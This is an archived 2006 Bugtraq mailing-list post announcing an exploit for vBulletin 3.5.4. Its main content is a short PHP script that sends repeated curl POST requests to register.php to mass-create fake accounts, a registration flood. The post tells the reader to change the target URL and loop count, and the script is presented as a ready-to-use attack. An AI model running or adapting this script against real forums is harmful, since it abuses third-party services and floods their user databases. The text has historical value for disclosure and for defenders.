lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060815010801.31332.qmail@securityfocus.com>
Date: 15 Aug 2006 01:08:01 -0000
From: dicomdk@...il.com
To: bugtraq@...urityfocus.com
Subject: UPDATE vBulletin Version 3.5.4 exploit

####################### vBulletin Version 3.5.4 #########################
Script     : vBulletin Version 3.5.4
site       : www.vbulletin.com
Exploit by : x-boy 
E-mail     : Dicomdk@...il.com
Type       : Registration flood in register.php 
Thanks to  : Simo64 
#########################################################################
Code of exploit (For english version , you can change it to other language)=> exploit.php 
cURL Must be activated  (http://curl.haxx.se)
Sorry for my bad English :-)
#########################################################################
<?
set_time_limit(60);
//You can change 10 to other numbers  
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request 
$ch = curl_init();
//change http://localhost/vb3 to the url of the script 
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@...il.com&emailconfirm=dicomdk'.$i.'@...il.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished  good luck 
?>
##########################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ